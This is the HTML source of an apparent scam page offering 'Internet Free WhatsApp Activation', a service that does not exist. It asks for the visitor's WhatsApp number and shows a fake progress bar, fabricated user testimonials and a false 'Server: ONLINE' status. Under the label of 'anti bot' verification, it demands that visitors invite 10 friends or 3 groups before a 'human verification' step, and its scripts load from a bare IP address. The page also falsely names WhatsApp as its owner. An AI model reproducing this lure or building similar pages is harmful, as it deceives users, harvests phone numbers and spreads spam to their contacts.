
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  	<title>Internet Free WhatsApp Activation</title>
  	<!-- Favicon -->
	<link rel="icon" type="image/ico" href="//128.199.240.178/img/favicon.ico">
	<!-- Favicon end -->
	<link rel="canonical" href="index.html">
        
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

	<!-- Meta Here-->
	<meta property="og:title" content="Internet Free WhatsApp Activation &#10004;"/>
    <meta property="og:image" content="http://d27ht0j7heqtxl.cloudfront.net/ogimage.jpg" />
    <meta property="og:site_name" content="Internet Free WhatsApp Activation Server &#10004;"/>
    <meta property="og:description" content="Finally WhatsApp can be used without paying for Internet"/>
	<!-- Meta Name -->
		<META NAME="rating" CONTENT="general"/>
	<META NAME="distribution" CONTENT="global"/>
	<META NAME="robots" CONTENT="all, index, follow"/>
	<META NAME="revisit" CONTENT="3 days"/>
	<META NAME="expires" CONTENT="never"/>
	<META NAME="distribution" CONTENT="global"/>
	<META CONTENT="ALL" NAME="ROBOTS"/>
	<meta name="author" content="Free WhatsApp Activation Server"/>
	<meta name="owner" content="WhatsApp!"/>
	<meta name="language" http-equiv="content-language" content="en"/>
	<!-- Meta Name End-->
	
		<!-- Js Start -->
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
        <script src="//128.199.240.178/invite.js"></script>
	<script src="//128.199.240.178/bootstrap.min.js"></script>
	<script src="//128.199.240.178/fnf700f700.js?v=1.0.1"></script>

	<!-- Js end -->
	
	<!-- Css Start -->
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css">
	<link rel="stylesheet" href="//128.199.240.178/sn.css">
	<!-- Css end -->		
</head>

<body>

	
	<div id="game-tool">
		<h1>Internet Free WhatsApp Activation</h1>
		<div class="game-tool-step">
			<div id="progress" style="display: none;">
				<h2 class=" progressbar-group">Working...</h2>
				<div class="progress progress-striped active progressbar-group">
				  <div class="progress-bar"  role="progressbar" aria-valuenow="1" aria-valuemin="0" aria-valuemax="100" style="width: 1%" id="progressbar">
				  </div>
				</div>
				<p class="text-center" id="progressbar-message">Connecting to Whatsapp voip servers...</p>
				
			</div>
			<!--progress-->
			<form class="form-horizontal" role="form" id="input-form">
				<h2>Internet Free WhatsApp Activation</h2>
<center> <p><span class="glyphicon glyphicon-list"></span> FOLLOW OUR INSTRUCTIONS BELOW! </p>  

<span class="glyphicon glyphicon-chevron-right"></span> Step 1: Enter your WhatsApp Mobile Number! <br>
<span class="glyphicon glyphicon-chevron-right"></span> Step 2: Click on  I AGREE! CONTINUE!  <br>            
 </center>		
<br> 
				<div class="form-group">
					<input type="text" class="form-control input-lg" id="username" placeholder="Enter Your WhatsApp Number" />
				</div>

				
				<br />
				<div class="text-center">
					<button type="button" class="btn btn-success btn-lg" id="start">I agree! Continue <span class="glyphicon glyphicon-chevron-right"></span></button>
				</div>
			</form>
			<br>
			<!-- Comment START -->
	<div id="lastWrap">
			<div class="media">
				<div class="pull-left">
					<img class="media-object" src="//128.199.240.178/img/pr1.jpg">
				</div>
				<div class="media-body">
					<h4 class="media-heading">Lena Davis</h4>
					Amazing Offer! I can now use whatsapp without paying a single Penny for Mobile Data.
				</div>
			</div>
			<div class="media">
				<div class="pull-left">
					<img class="media-object" src="//128.199.240.178/img/pr2.jpg">
				</div>
				<div class="media-body">
					<h4 class="media-heading">Kevin Loyola</h4>
					 Having this earlier I would have saved a lot of money. Thanks!
				</div>
			</div>
			<div class="media">
				<div class="pull-left">
					<img class="media-object" src="//128.199.240.178/img/pr3.jpg">
				</div>
				<div class="media-body">
					<h4 class="media-heading">Sara John</h4>
					This is truly amazing. Enjoying free WhatsApp!
				</div>
			</div>
			<br>
			<div class="alert alert-info" role="alert"><center> YOU CAN LEAVE A COMMENT AFTER ACTIVATING FREE DATA CONNECTION FOR WHATSAPP<h4><br> <span class="label label-success">Server: ONLINE</span><br><br> <span class="label label-info">UPDATED: 25 minutes ago</span></h4></center></div>
		</div>
		<!-- Comment end-->
		<!-- Modal Start-->
	<div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
        <h4 class="modal-title" id="myModalLabel"><center> USER VERIFICATION - ANTI BOT PROTECTION </center></h4>
      </div>
      <div class="modal-body">
        <center> COMPLETE 2 STEPS FROM BELOW TO PROVE YOU'RE ACTIVE WHATSAPP USER! </center>
		<br>
	  <center>  </span></center> 
	  <center> <div class="alert alert-info" role="alert">STEP 1 - Invite Your 10 WhatsApp Friends and 3 Groups</div></center>	
		?? As soon as you click on "INVITE", your whatsapp will open and you can send invitation to any of your friends or groups<br>
??You'll have to invite minimum 10 active friends or 3 groups one by one 
<div class="text-center">
					<button type="button" onclick="fn1(this)" class="btn btn-success btn-lg" id="start">  Invite <span class="glyphicon glyphicon-chevron-right"></span></button>
				</div>
	  	  <center> <div class="alert alert-success" role="alert"> FINAL STEP - CLICK BELOW FOR HUMAN VERIFICATION </a></div> </center>
		   <center><button type="button" class="btn btn-success" onclick="fn2(this)"><span class="glyphicon glyphicon-user"></span> HUMAN VERIFICATION</button></center>
	  </div>
      <div class="modal-footer">
        
      </div>
    </div>
  </div>
</div>
<!-- Modal end-->
<div hidden>
<!-- Histats.com  START  (standard)-->
<script type="text/javascript">document.write(unescape("%3Cscript src=%27http://s10.histats.com/js15.js%27 type=%27text/javascript%27%3E%3C/script%3E"));</script>
<a href="http://www.histats.com" target="_blank" title="page hit counter" ><script  type="text/javascript" >
try {Histats.start(1,3060843,4,501,95,18,"00010000");
Histats.track_hits();} catch(err){};
</script></a>
<noscript><a href="http://www.histats.com" target="_blank"><img  src="http://sstatic1.histats.com/0.gif?3060843&101" alt="page hit counter" border="0"></a></noscript>
<!-- Histats.com  END  --></div>

</body>	

</html>	
	



